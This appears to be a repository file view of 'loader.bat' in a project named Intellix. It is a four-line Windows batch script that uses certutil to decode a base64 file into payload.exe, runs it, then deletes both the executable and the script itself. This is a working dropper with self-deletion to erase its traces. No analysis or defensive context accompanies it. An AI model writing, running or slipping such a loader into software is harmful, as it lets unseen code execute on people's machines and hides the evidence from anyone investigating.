Files
Intellix/loader.bat
T

5 lines
90 B
Batchfile
Raw Normal View History

2026-08-27 10:55:23 -06:00
certutil -decode payload.b64 payload.exe
start payload.exe
del payload.exe
del loader.bat